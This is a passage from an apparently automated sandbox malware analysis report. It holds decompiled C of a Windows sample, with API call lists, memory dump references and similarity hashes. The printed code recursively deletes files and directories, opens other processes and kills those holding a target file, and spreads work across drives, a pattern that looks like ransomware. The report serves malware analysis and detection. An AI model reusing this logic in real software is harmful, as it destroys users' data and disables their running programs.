                                                                                        • NtClose.NTDLL(000000FF), ref: 00405F95
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004060F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406109
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Allocate$CloseCreateFileFreewcscatwcscpywcslen$CompletionMovePort
                                                                                        • String ID: .2c9ccbf3$7i@
                                                                                        • API String ID: 3849767442-808895345
                                                                                        • Opcode ID: d80a8b62539f20cdfa3ba579f7fffa61cd97d2d289079b7a4f43672732282450
                                                                                        • Instruction ID: d64980988642996bc52c138ed99c137cb337b3e5925c0458dab4666810768f6e
                                                                                        • Opcode Fuzzy Hash: d80a8b62539f20cdfa3ba579f7fffa61cd97d2d289079b7a4f43672732282450
                                                                                        • Instruction Fuzzy Hash: B08169B0940204EFDF209F60DD89B8A3BB4FB04305F104175F915BA6E2DB7A9969CF49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040409F, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040409F(wchar_t* _a4) {
				void* _v8;
				long _v12;
				wchar_t* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				int _t46;
				int _t56;
				int _t57;
				wchar_t* _t70;
				void* _t74;
				void* _t75;
				void* _t77;

				_v16 = 0;
				_v20 = 0;
				_t46 = wcslen(_a4);
				_t75 = _t74 + 4;
				if(_t46 == 0) {
					L17:
					return _t46;
				}
				_t46 = RtlAllocateHeap( *0x40f5d6, 8, 6 + _t46 * 2);
				_v16 = _t46;
				if(_v16 == 0) {
					L13:
					if(_v16 != 0) {
						_t46 = RtlFreeHeap( *0x40f5d6, 0, _v16);
					}
					if(_v20 == 0) {
						goto L17;
					} else {
						return RtlFreeHeap( *0x40f5d6, 0, _v20);
					}
				}
				wcscpy(_v16, _a4);
				E00401A3A(_v16);
				_v12 = 0x2a;
				wcscat(_v16,  &_v12);
				_t77 = _t75 + 0x10;
				_t46 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, 0);
				_v8 = _t46;
				if(_v8 == 0xffffffff) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 =  &(_v612.cFileName);
					if( *_t70 != 0x2e &&  *_t70 != 0x2e002e) {
						_t56 = wcslen(_t70);
						_t57 = wcslen(_v16);
						_t77 = _t77 + 8;
						_v20 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t56 + _t57) * 2);
						if(_v20 != 0) {
							wcscpy(_v20, _v16);
							wcscpy(wcsrchr(_v20, 0x2a),  &(_v612.cFileName));
							_t77 = _t77 + 0x18;
							if((GetFileAttributesW(_v20) & 0x00000010) == 0) {
								DeleteFileW(_v20);
								RtlFreeHeap( *0x40f5d6, 0, _v20);
								_v20 = 0;
							} else {
								if(E00401B91(_v20) == 0) {
									E0040409F(_v20);
								}
								RemoveDirectoryW(_v20);
								RtlFreeHeap( *0x40f5d6, 0, _v20);
								_v20 = 0;
							}
						}
					}
				} while (FindNextFileW(_v8,  &_v612) != 0);
				_t46 = FindClose(_v8);
				goto L13;
			}















                                                                                        0x004040ad
                                                                                        0x004040b4
                                                                                        0x004040be
                                                                                        0x004040c4
                                                                                        0x004040c9
                                                                                        0x0040428a
                                                                                        0x0040428a
                                                                                        0x0040428a
                                                                                        0x004040df
                                                                                        0x004040e5
                                                                                        0x004040ec
                                                                                        0x00404254
                                                                                        0x00404258
                                                                                        0x00404265
                                                                                        0x00404265
                                                                                        0x0040426f
                                                                                        0x00000000
                                                                                        0x00404271
                                                                                        0x00000000
                                                                                        0x0040427c
                                                                                        0x0040426f
                                                                                        0x004040f8
                                                                                        0x00404104
                                                                                        0x00404109
                                                                                        0x00404117
                                                                                        0x0040411d
                                                                                        0x00404132
                                                                                        0x00404138
                                                                                        0x0040413f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404145
                                                                                        0x00404145
                                                                                        0x00404145
                                                                                        0x0040414e
                                                                                        0x00404161
                                                                                        0x0040416f
                                                                                        0x00404175
                                                                                        0x00404190
                                                                                        0x00404197
                                                                                        0x004041a3
                                                                                        0x004041c2
                                                                                        0x004041c8
                                                                                        0x004041d9
                                                                                        0x00404215
                                                                                        0x00404226
                                                                                        0x0040422c
                                                                                        0x004041db
                                                                                        0x004041e5
                                                                                        0x004041ea
                                                                                        0x004041ea
                                                                                        0x004041f2
                                                                                        0x00404203
                                                                                        0x00404209
                                                                                        0x00404209
                                                                                        0x004041d9
                                                                                        0x00404197
                                                                                        0x00404243
                                                                                        0x0040424e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 004040BE
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004040DF
                                                                                        • wcscpy.NTDLL ref: 004040F8
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00404117
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00404132
                                                                                        • wcslen.NTDLL ref: 00404161
                                                                                        • wcslen.NTDLL ref: 0040416F
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040418A
                                                                                        • wcscpy.NTDLL ref: 004041A3
                                                                                        • wcsrchr.NTDLL ref: 004041B1
                                                                                        • wcscpy.NTDLL ref: 004041C2
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004041CE
                                                                                        • RemoveDirectoryW.KERNEL32(00000000,00000000), ref: 004041F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404203
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00404215
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404226
                                                                                          • Part of subcall function 00401B91: wcslen.NTDLL ref: 00401BBA
                                                                                          • Part of subcall function 00401B91: RtlAllocateHeap.NTDLL(00000008,00000000,?), ref: 00401BD3
                                                                                          • Part of subcall function 00401B91: wcscpy.NTDLL ref: 00401BEC
                                                                                          • Part of subcall function 00401B91: wcscat.NTDLL ref: 00401C0B
                                                                                          • Part of subcall function 00401B91: FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00401C26
                                                                                          • Part of subcall function 00401B91: FindClose.KERNEL32(000000FF), ref: 00401C68
                                                                                          • Part of subcall function 00401B91: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401C7F
                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 0040423D
                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040424E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404265
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040427C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$FileFindFreewcslen$wcscpy$Allocate$CloseFirstwcscat$AttributesDeleteDirectoryNextRemovewcsrchr
                                                                                        • String ID: *
                                                                                        • API String ID: 3491126630-163128923
                                                                                        • Opcode ID: 5e81489fd4901c3b4ff25ce478bfa37c0ad1991712d7b8a2e1fb93892d34b3da
                                                                                        • Instruction ID: 1492c8db7d695e76714a3bd2c79d4e5b7cd140cbf661b2fc1bb93d2064f1f6ca
                                                                                        • Opcode Fuzzy Hash: 5e81489fd4901c3b4ff25ce478bfa37c0ad1991712d7b8a2e1fb93892d34b3da
                                                                                        • Instruction Fuzzy Hash: 02514570900218FFDB219FA0ED09BAEBB75FB44302F404579FA11B11B0DB761A69DB49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407784, Relevance: 36.3, APIs: 24, Instructions: 278memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 88%
                                                                                        			E00407784() {
				long _v8;
				intOrPtr _v12;
				wchar_t** _v16;
				void* _v20;
				char _v24;
				char _v28;
				long _v32;
				char _v36;
				void* _v40;
				HANDLE* _v44;
				void* _v48;
				intOrPtr _v52;
				short _v572;
				intOrPtr _t94;
				char _t97;
				void* _t104;
				void* _t105;
				int _t109;
				int _t110;
				void* _t119;
				void* _t120;
				signed int _t123;
				wchar_t** _t124;
				long _t125;
				void* _t134;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t144;

				_v48 = RtlAllocateHeap( *0x40f5d6, 8, 0x1000);
				if(_v48 != 0) {
					_v52 = E00407380(_v48);
					if(_v52 != 0) {
						if( *0x40f5e6 == 0) {
							if( *0x40f5ea == 0) {
								_t94 = 0;
							} else {
								_t94 =  *0x40f5ea; // 0x0
							}
						} else {
							_t94 =  *0x40f5e6; // 0x0
						}
						_v12 = _t94;
						if(GetModuleFileNameW(0,  &_v572, 0x104) != 0) {
							_t97 = E00406BF9();
							_v36 = _t97;
							_v8 = 0;
							_t139 = _v48;
							do {
								asm("lodsd");
								_v20 = _t97;
								_v40 = 0;
								_v44 = 0;
								_v32 = 0;
								_t97 = E004072E0(_v20, 1,  &_v16, 0xffffffff,  &_v24,  &_v28,  &_v32, 0x64);
								if(_t97 != 0) {
									goto L48;
								}
								_t123 = _v36;
								_t97 = RtlAllocateHeap( *0x40f5d6, 8, _t123 * 4);
								_v44 = _t97;
								if(_v44 != 0) {
									if( *0x40f5a5 == 0) {
										_v40 = 0;
										L20:
										_t124 = _v16;
										do {
											if(_t124[1] == 0) {
												L26:
												_t97 = E00407153(_v12, _v20,  *_t124);
												if(_t97 == 0) {
													goto L38;
												}
												_t109 = wcslen(_v20 + 4);
												_t110 = wcslen( *_t124);
												_t144 = _t144 + 8;
												_t97 = RtlAllocateHeap( *0x40f5d6, 8, 0xe + (_t109 + _t110) * 2);
												_t137 = _t97;
												if(_t137 == 0) {
													goto L38;
												}
												 *_t137 = 0x4e0055;
												 *((intOrPtr*)(_t137 + 4)) = 0x5c0043;
												wcscat(_t137, _v20 + 4);
												wcscat(_t137,  *_t124);
												_t144 = _t144 + 0x10;
												E00406C06(_v12,  &_v572, _t137, _v8, _v44, _v40);
												RtlFreeHeap( *0x40f5d6, 0, _t137);
												_v8 = _v8 + 1;
												_t97 = _v36;
												if(_v8 != _t97) {
													goto L38;
												}
												_t119 = WaitForMultipleObjects(_v8, _v44, 1, 0xffffffff);
												_push(_t139);
												if(_v40 == 0) {
													L35:
													do {
														asm("lodsd");
														_t119 = NtClose(_t119);
														_v8 = _v8 - 1;
													} while (_v8 != 0);
													_pop(_t139);
													goto L38;
												}
												_push(_v8);
												do {
													asm("lodsd");
													_t138 = _t119;
													_t120 = MapViewOfFile(_t138, 0xf001f, 0, 0, 0x10);
													if(_t120 != 0) {
														 *0x40f638 =  *0x40f638 +  *_t120;
														 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t120 + 4));
														 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t120 + 8));
														asm("adc [0x40f640], ecx");
														UnmapViewOfFile(_t120);
													}
													_t119 = NtClose(_t138);
													_v8 = _v8 - 1;
												} while (_v8 != 0);
												_pop( *_t60);
												goto L35;
											}
											if(_t124[1] != 0x80000000) {
												L25:
												goto L38;
											}
											_t97 = E00407236( *_t124);
											if(_t97 != 0) {
												goto L25;
											}
											goto L26;
											L38:
											_t124 =  &(_t124[3]);
											_v24 = _v24 - 1;
										} while (_v24 != 0);
										if(_v8 == 0) {
											goto L48;
										}
										_t104 = WaitForMultipleObjects(_v8, _v44, 1, 0xffffffff);
										_push(_t139);
										if(_v40 == 0) {
											L45:
											do {
												asm("lodsd");
												_t104 = NtClose(_t104);
												_v8 = _v8 - 1;
											} while (_v8 != 0);
											_pop(_t139);
											goto L48;
										}
										_t125 = _v8;
										do {
											asm("lodsd");
											_t134 = _t104;
											_t105 = MapViewOfFile(_t134, 0xf001f, 0, 0, 0x10);
											if(_t105 != 0) {
												 *0x40f638 =  *0x40f638 +  *_t105;
												 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t105 + 4));
												 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t105 + 8));
												asm("adc [0x40f640], ecx");
												UnmapViewOfFile(_t105);
											}
											_t104 = NtClose(_t134);
											_t125 = _t125 - 1;
										} while (_t125 != 0);
										goto L45;
									}
									_t97 = RtlAllocateHeap( *0x40f5d6, 8, _t123 * 4);
									_v40 = _t97;
									if(_v40 != 0) {
										goto L20;
									}
									goto L55;
								}
								goto L55;
								L48:
								if(_v20 != 0) {
									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v20);
								}
								if(_v44 != 0) {
									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v44);
								}
								if(_v40 != 0) {
									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v40);
								}
								_v52 = _v52 - 1;
							} while (_v52 != 0);
							goto L55;
						} else {
							L55:
							if(_v48 == 0) {
								return _t97;
							}
							return RtlFreeHeap( *0x40f5d6, 0, _v48);
						}
					}
					goto L55;
				}
				goto L55;
			}
































                                                                                        0x004077a5
                                                                                        0x004077ac
                                                                                        0x004077bb
                                                                                        0x004077c2
                                                                                        0x004077d0
                                                                                        0x004077e0
                                                                                        0x004077e9
                                                                                        0x004077e2
                                                                                        0x004077e2
                                                                                        0x004077e2
                                                                                        0x004077d2
                                                                                        0x004077d2
                                                                                        0x004077d2
                                                                                        0x004077eb
                                                                                        0x00407804
                                                                                        0x0040780b
                                                                                        0x00407810
                                                                                        0x00407813
                                                                                        0x0040781a
                                                                                        0x0040781d
                                                                                        0x0040781d
                                                                                        0x0040781e
                                                                                        0x00407821
                                                                                        0x00407828
                                                                                        0x0040782f
                                                                                        0x0040784f
                                                                                        0x00407856
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040785c
                                                                                        0x0040786f
                                                                                        0x00407875
                                                                                        0x0040787c
                                                                                        0x0040788a
                                                                                        0x004078b2
                                                                                        0x004078b9
                                                                                        0x004078b9
                                                                                        0x004078bc
                                                                                        0x004078c0
                                                                                        0x004078dd
                                                                                        0x004078e5
                                                                                        0x004078ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004078f9
                                                                                        0x00407906
                                                                                        0x0040790c
                                                                                        0x00407921
                                                                                        0x00407927
                                                                                        0x0040792b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407931
                                                                                        0x00407937
                                                                                        0x00407946
                                                                                        0x00407952
                                                                                        0x00407958
                                                                                        0x0040796f
                                                                                        0x0040797d
                                                                                        0x00407983
                                                                                        0x00407986
                                                                                        0x0040798c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040799c
                                                                                        0x004079a2
                                                                                        0x004079a7
                                                                                        0x00407a05
                                                                                        0x00407a08
                                                                                        0x00407a08
                                                                                        0x00407a0a
                                                                                        0x00407a10
                                                                                        0x00407a13
                                                                                        0x00407a19
                                                                                        0x00000000
                                                                                        0x00407a19
                                                                                        0x004079a9
                                                                                        0x004079af
                                                                                        0x004079af
                                                                                        0x004079b0
                                                                                        0x004079be
                                                                                        0x004079c6
                                                                                        0x004079ca
                                                                                        0x004079d3
                                                                                        0x004079dc
                                                                                        0x004079e5
                                                                                        0x004079ec
                                                                                        0x004079ec
                                                                                        0x004079f3
                                                                                        0x004079f9
                                                                                        0x004079fc
                                                                                        0x00407a02
                                                                                        0x00000000
                                                                                        0x00407a02
                                                                                        0x004078c9
                                                                                        0x004078d8
                                                                                        0x00000000
                                                                                        0x004078d8
                                                                                        0x004078cd
                                                                                        0x004078d4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407a1a
                                                                                        0x00407a1a
                                                                                        0x00407a1d
                                                                                        0x00407a20
                                                                                        0x00407a2e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407a3e
                                                                                        0x00407a44
                                                                                        0x00407a49
                                                                                        0x00407aa0
                                                                                        0x00407aa3
                                                                                        0x00407aa3
                                                                                        0x00407aa5
                                                                                        0x00407aab
                                                                                        0x00407aae
                                                                                        0x00407ab4
                                                                                        0x00000000
                                                                                        0x00407ab4
                                                                                        0x00407a4b
                                                                                        0x00407a51
                                                                                        0x00407a51
                                                                                        0x00407a52
                                                                                        0x00407a60
                                                                                        0x00407a68
                                                                                        0x00407a6c
                                                                                        0x00407a75
                                                                                        0x00407a7e
                                                                                        0x00407a87
                                                                                        0x00407a8e
                                                                                        0x00407a8e
                                                                                        0x00407a95
                                                                                        0x00407a9b
                                                                                        0x00407a9c
                                                                                        0x00000000
                                                                                        0x00407a51
                                                                                        0x0040789c
                                                                                        0x004078a2
                                                                                        0x004078a9
                                                                                        0x00000000
                                                                                        0x004078b0
                                                                                        0x00000000
                                                                                        0x004078ab
                                                                                        0x00000000
                                                                                        0x00407ab5
                                                                                        0x00407ab9
                                                                                        0x00407ac6
                                                                                        0x00407ac6
                                                                                        0x00407ad0
                                                                                        0x00407add
                                                                                        0x00407add
                                                                                        0x00407ae7
                                                                                        0x00407af4
                                                                                        0x00407af4
                                                                                        0x00407afa
                                                                                        0x00407afd
                                                                                        0x00000000
                                                                                        0x00407806
                                                                                        0x00407b07
                                                                                        0x00407b0b
                                                                                        0x00407b26
                                                                                        0x00407b26
                                                                                        0x00000000
                                                                                        0x00407b18
                                                                                        0x00407804
                                                                                        0x00000000
                                                                                        0x004077c4
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040779F
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00407B18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 2488874121-0
                                                                                        • Opcode ID: d21f918a2e1e0284cbbdd58ae77193405c80fe2d38715db99d9f2e5c05684a7b
                                                                                        • Instruction ID: e27386cccb6b0d59a5aa9b3d59438d4793f7219406efa69682022a7a7f05bdd0
                                                                                        • Opcode Fuzzy Hash: d21f918a2e1e0284cbbdd58ae77193405c80fe2d38715db99d9f2e5c05684a7b
                                                                                        • Instruction Fuzzy Hash: 53B15831D04208EFDB21DF94DE48BAEBBB5FB08315F10403AE501B62A1D7796949DF1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004056D4, Relevance: 36.2, APIs: 24, Instructions: 214memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 89%
                                                                                        			E004056D4(WCHAR* _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				void* _v76;
				WCHAR* _t72;
				long _t77;
				void* _t81;
				long _t82;
				intOrPtr* _t87;
				WCHAR* _t101;
				void* _t102;
				WCHAR* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t120;
				long* _t121;
				void* _t122;
				void* _t123;

				_v8 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v16 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t117 = _a4;
				_t72 = PathFindFileNameW(_t117);
				if(_t72 == _t117) {
					L34:
					return _v8;
				} else {
					_v28 = _t72;
					_t118 = E00405564();
					_v44 = 0x400;
					_v40 = RtlAllocateHeap( *0x40f5d6, 0, _v44);
					while(1) {
						_t77 = NtQuerySystemInformation(0x10, _v40, _v44,  &_v44);
						if(_t77 == 0) {
							break;
						}
						if(_t77 != 0xc0000004) {
							RtlFreeHeap( *0x40f5d6, 0, _v40);
							return _v8;
						} else {
							_v40 = RtlReAllocateHeap( *0x40f5d6, 0, _v40, _v44);
							continue;
						}
						goto L35;
					}
					_t81 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
					_v32 = _t81;
					_t121 = _v40;
					asm("lodsd");
					_t120 = _t81;
					_v12 = 0;
					do {
						_t119 = _v16;
						_t82 = _v12;
						if(_t121[1] != _t118 ||  *_t121 <= 4 ||  *_t121 == _t82 ||  *_t121 == _t119) {
							goto L27;
						} else {
							_v20 = 0;
							_v52 =  *_t121;
							_v48 = 0;
							_t87 =  &_v76;
							 *_t87 = 0x18;
							 *(_t87 + 4) = 0;
							 *(_t87 + 8) = 0;
							 *(_t87 + 0xc) = 0;
							 *(_t87 + 0x10) = 0;
							 *(_t87 + 0x14) = 0;
							if(NtOpenProcess( &_v20, 0x100441,  &_v76,  &_v52) == 0) {
								if(NtDuplicateObject(_v20, _t121[1] & 0x0000ffff, 0xffffffff,  &_v24, 0, 0, 2) == 0) {
									if(E004054E0(_v24, _v32) != 0) {
										memset(_v32, 0, 0x10000);
										_t122 = _t122 + 0xc;
										goto L25;
									} else {
										_t101 = PathFindFileNameW(_v32 + 4);
										_t102 =  *0x40f694(_t101, _v28);
										_t123 = _t122 + 8;
										if(_t102 != 0) {
											memset(_v32, 0, 0x10000);
											_t122 = _t123 + 0xc;
											L25:
											NtClose(_v24);
											goto L26;
										} else {
											_v36 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
											if(NtQueryInformationProcess(_v20, 0x1b, _v36, 0x10000,  &_v44) == 0) {
												if(E0040567D(PathFindFileNameW( *(_v36 + 4))) == 0) {
													 *0x40f708(_v20, 0);
													WaitForSingleObject(_v20, 0xffffffff);
													_v8 = 1;
												}
												NtClose(_v24);
												NtClose(_v20);
											}
										}
									}
								} else {
									_v12 =  *_t121;
									L26:
									NtClose(_v20);
									goto L27;
								}
							} else {
								_v12 =  *_t121;
								goto L27;
							}
						}
						break;
						L27:
						_t121 =  &(_t121[4]);
						_t120 = _t120 - 1;
					} while (_t120 != 0);
					if(_v40 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v40);
					}
					if(_v32 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v32);
					}
					if(_v36 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v36);
					}
					goto L34;
				}
				L35:
			}






























                                                                                        0x004056df
                                                                                        0x004056e6
                                                                                        0x004056ed
                                                                                        0x004056f4
                                                                                        0x00405704
                                                                                        0x00405707
                                                                                        0x0040570b
                                                                                        0x00405713
                                                                                        0x004059a9
                                                                                        0x004059b4
                                                                                        0x00405719
                                                                                        0x00405719
                                                                                        0x00405721
                                                                                        0x00405723
                                                                                        0x0040573b
                                                                                        0x0040573e
                                                                                        0x0040574a
                                                                                        0x00405752
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x00405785
                                                                                        0x00405796
                                                                                        0x0040575f
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x004057a8
                                                                                        0x004057ae
                                                                                        0x004057b1
                                                                                        0x004057b4
                                                                                        0x004057b5
                                                                                        0x004057b7
                                                                                        0x004057be
                                                                                        0x004057be
                                                                                        0x004057c1
                                                                                        0x004057c7
                                                                                        0x00000000
                                                                                        0x004057e6
                                                                                        0x004057e6
                                                                                        0x004057ef
                                                                                        0x004057f2
                                                                                        0x004057f9
                                                                                        0x004057fc
                                                                                        0x00405802
                                                                                        0x00405809
                                                                                        0x00405810
                                                                                        0x00405817
                                                                                        0x0040581e
                                                                                        0x0040583e
                                                                                        0x00405866
                                                                                        0x0040587f
                                                                                        0x0040593d
                                                                                        0x00405943
                                                                                        0x00000000
                                                                                        0x00405885
                                                                                        0x0040588c
                                                                                        0x00405896
                                                                                        0x0040589c
                                                                                        0x004058a1
                                                                                        0x00405928
                                                                                        0x0040592e
                                                                                        0x00405946
                                                                                        0x00405949
                                                                                        0x00000000
                                                                                        0x004058a3
                                                                                        0x004058b6
                                                                                        0x004058d2
                                                                                        0x004058eb
                                                                                        0x004058f2
                                                                                        0x004058fd
                                                                                        0x00405903
                                                                                        0x00405903
                                                                                        0x0040590d
                                                                                        0x00405916
                                                                                        0x00405916
                                                                                        0x0040591c
                                                                                        0x004058a1
                                                                                        0x00405868
                                                                                        0x0040586a
                                                                                        0x0040594f
                                                                                        0x00405952
                                                                                        0x00000000
                                                                                        0x00405952
                                                                                        0x00405840
                                                                                        0x00405842
                                                                                        0x00000000
                                                                                        0x00405842
                                                                                        0x0040583e
                                                                                        0x00000000
                                                                                        0x00405958
                                                                                        0x00405958
                                                                                        0x0040595b
                                                                                        0x0040595c
                                                                                        0x00405968
                                                                                        0x00405975
                                                                                        0x00405975
                                                                                        0x0040597f
                                                                                        0x0040598c
                                                                                        0x0040598c
                                                                                        0x00405996
                                                                                        0x004059a3
                                                                                        0x004059a3
                                                                                        0x00000000
                                                                                        0x00405996
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • PathFindFileNameW.SHLWAPI(?,00000000,?,?,?,?), ref: 0040570B
                                                                                          • Part of subcall function 00405564: RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 00405588
                                                                                          • Part of subcall function 00405564: NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                          • Part of subcall function 00405564: _wcsicmp.NTDLL ref: 00405613
                                                                                          • Part of subcall function 00405564: RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00405735
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree$Query$FileFindInformationNameObjectOpenPathProcessSystem_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 780744661-0
                                                                                        • Opcode ID: b52b44ac54c2e9d9a8cec1c80db52c9f8485237dd8de7a5e49fd5336b9c97d7d
                                                                                        • Instruction ID: c0de1c5d6ea3ba0be0971763f5dab08ae73666abd404ef5d77822f984a4be386
                                                                                        • Opcode Fuzzy Hash: b52b44ac54c2e9d9a8cec1c80db52c9f8485237dd8de7a5e49fd5336b9c97d7d
                                                                                        • Instruction Fuzzy Hash: 23813571900209EFDF219FA4DD49BAEBBB4FB08311F204436F601B62A0D77A9959DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004066AC, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 220memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E004066AC(WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				wchar_t* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				int _t66;
				void* _t77;
				wchar_t* _t82;
				int _t86;
				int _t87;
				wchar_t* _t99;
				void* _t103;
				void* _t104;
				void* _t105;

				_v16 = 0;
				_v20 = 0;
				_t66 = wcslen(_a4);
				_t104 = _t103 + 4;
				if(_t66 == 0) {
